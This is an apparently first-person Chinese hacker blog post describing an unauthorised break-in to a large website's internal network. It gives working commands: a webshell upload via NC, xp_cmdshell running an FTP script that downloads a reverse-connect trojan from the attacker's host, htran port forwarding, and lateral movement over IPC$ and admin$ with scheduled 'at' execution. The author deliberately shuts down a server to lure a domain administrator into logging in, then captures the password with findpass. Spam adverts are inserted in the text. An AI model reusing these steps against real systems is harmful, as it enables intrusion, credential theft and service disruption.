社會工程學(xué)的思維突破內(nèi)網(wǎng).doc

社會工程學(xué)的思維突破內(nèi)網(wǎng) 文/KYO 前些天剛收到e-mail，得知我通過了CISP的考試。高興之余把我滲透一個全世界排名100多名的大站的過程寫出來，也好和大家一起學(xué)習(xí)，共同進(jìn)步。 至于入侵的原因，我也不多說了。目標(biāo)是mms.*.com，是用aspx寫的，先用iiswrite.exe檢測一下，結(jié)果如下：通過檢測結(jié)果，大概可以了解到目標(biāo)WEB服務(wù)器是win2000，我認(rèn)為至少比win2003搞起來輕松點。不過通過域名查詢知道，服務(wù)器IP沒有綁定任何國際域名，首先旁注是沒轍了。再從掃描的端口上來看，只開了21和80，只有ftp服務(wù)和web對外開放，肯定做了安全策略和安裝了防火墻。既然開了FTP，就登陸試試看看返回的信息是什么吧。220 hw-9ab3d94fe590 Microsoft FTP Service (Version 5.0).從以上信息得知，服務(wù)器十有八九用的是微軟自帶的FTP（至于是否改了binner，盡量先不考慮），至少想從webshell上利用serv-u提升權(quán)限是不可能的了。另外還有一點信息hw-9ab3d94fe590即為該機(jī)器的機(jī)器名。那么FTP的帳戶信息和該服務(wù)器的帳戶應(yīng)該是一一對應(yīng)的，暴力破解的苦力活我是不做了，意義不大。然后再看80，aspx的，首先注入是找不到了，后臺猜了半天也沒猜出來，看來主動進(jìn)攻不太好進(jìn)行。*這里插播個廣告，黑友們請無視，只是為朋友的網(wǎng)站能被搜索引擎收錄，多加點流量。返利網(wǎng),淘你喜歡,淘寶返利,淘寶返現(xiàn)購物。* 換個思路吧，看看他的C類段有沒有弱弱的機(jī)子，經(jīng)過掃描知道，那個C類網(wǎng)段基本都是這個網(wǎng)站的分站。經(jīng)過艱苦的尋找和測試，利用一個掃描網(wǎng)站多級目錄頁面的辦法找到一個上傳頁面，后面的事情大家都知道怎么做的，抓包，改數(shù)據(jù)，再用NC提交。不過第一次沒有成功，提示寫入失敗，既然默認(rèn)的目錄不可寫，那我們在網(wǎng)站上隨便再找一個認(rèn)為可寫的目錄再測試，經(jīng)過查找源代碼里面的信息，找到一個圖片目錄，然后再修改包的內(nèi)容，再用NC提交，OK，這次成功了。拿到了他C類段一個站的WEBSHELL。通過服務(wù)器組建探測，知道他沒有禁用WScript.Shell那么我們可以了解到很多信息。通過ipconfig /all 了解到他們的站基本上都是內(nèi)網(wǎng)的服務(wù)，然后把一些服務(wù)的端口映射出來的。Net start發(fā)現(xiàn)本機(jī)開了終端和radmin，但是我們連不上的。再進(jìn)入系統(tǒng)目錄下，看他打補(bǔ)丁的情況，通過補(bǔ)丁編號，又知道他系統(tǒng)已經(jīng)打上最新補(bǔ)丁。就算他們內(nèi)網(wǎng)之間開了445，MS05039也用不了。再通過net localgroup administrators得到從這里我看到了希望，因為系統(tǒng)管理員有域管理員帳號，那么我們不管拿到哪臺機(jī)子的系統(tǒng)權(quán)限，如果域管理員在線，findpass就可以得到域管理員密碼了。好了，準(zhǔn)備工作做了這么多，下面開始提升權(quán)限。幸好他網(wǎng)站數(shù)據(jù)庫用的是ms sqlserver，找到Web.config,我們得到了sqlserver的用戶名和密碼，再利用2006自帶的微軟數(shù)據(jù)庫查看/操作器連接數(shù)據(jù)庫服務(wù)器。轉(zhuǎn)到命令執(zhí)行那里，exec master.dbo.xp_cmdshell “ping myip” ,馬上看到我的天網(wǎng)有反映了，那么至少知道xp_cmdshell是可以用的。下面就簡單了。利用以下腳本echo open myipkk1.txtecho kyokk1.txtecho kyo327kk1.txtecho get muma.exekk1.txtecho byekk1.txtftp -s:kk1.txt向數(shù)據(jù)庫服務(wù)器上傳我的反連的馬。這樣我們現(xiàn)在就拿到了數(shù)據(jù)庫服務(wù)器的系統(tǒng)權(quán)限?？梢钥吹轿覉?zhí)行query user,顯示沒有用戶。那怎么辦？嗅探吧。不能遠(yuǎn)程登陸3389，我用htran.exe轉(zhuǎn)出來再登陸。登上去以后準(zhǔn)備再傳一個cain，嗅探目標(biāo)的21端口，雖然希望不大，可這也是沒有辦法的辦法。為了不把我的shell弄死，我echo一個bat然后用at命令執(zhí)行。具體語句為：echo htran -slave myip 3389k.bat然后我在本機(jī)監(jiān)聽htran -listen 83 3389*這里插播個廣告，黑友們請無視，只是為朋友的網(wǎng)站能被搜索引擎收錄，多加點流量。返利網(wǎng),淘你喜歡,淘寶返利,淘寶返現(xiàn)購物。*等任務(wù)時間一到，我馬上打開終端登陸器，連接，輸入我剛加的用戶名密碼以后，卻彈出以下畫面：暈了，看來他們最后還有一手，哎，登陸終端又失敗了。 想了許久，感覺突破口就是怎么才能讓域管理登陸，我想如果他們網(wǎng)頁壞了，他們肯定會去維護(hù)的，不過他也可以登陸ftp維護(hù)啊。最終的辦法只有一個，先把得到WEBSHELL那個站的首頁改名（呵呵，我不做破壞的），然后直接shutdown掉那臺服務(wù)器。這樣他就不得不登陸了。我是在半夜4點多做完了這件事，一直熬到8點鐘，再刷新那個網(wǎng)站，發(fā)現(xiàn)已經(jīng)恢復(fù)了，馬上用我的后門登陸到他的CMD下的shell，執(zhí)行query user,果然有域管理員在線，接著findpass，這就是我利用社會工程學(xué)拿到了域管理員密碼的真實過程。并且我半個小時后再登陸后門query user，就發(fā)現(xiàn)沒有用戶了，看來他們的管理員也懂一點安全知識。幸虧我做的及時啊。拿到域管理員密碼再進(jìn)那個目標(biāo)機(jī)就簡單多了。過程就是利用以下語句Net use 92ipc$ “pass” /user:domainadministrator先和目標(biāo)機(jī)建立ipc連接。這里肯定有人問了，你怎么得到目標(biāo)機(jī)的內(nèi)網(wǎng)IP的。其實前面已經(jīng)做了鋪墊，我由ftp返回的binner信息知道了目標(biāo)機(jī)的機(jī)器名，那么我內(nèi)網(wǎng)CMDSHELL下直接ping機(jī)器名就OK了。Copy muma.exe 92admin$system32muma.exe把木馬copy到目標(biāo)機(jī)Net time 92得到目標(biāo)機(jī)的時間At 92 time muma.exe執(zhí)行我的反連木馬到此為止，我的這次入侵就結(jié)束了。說到底如何讓域管理員登陸是最重要的，不然我的一切勞動都成為炮灰。其實社會工程學(xué)博大精深，我這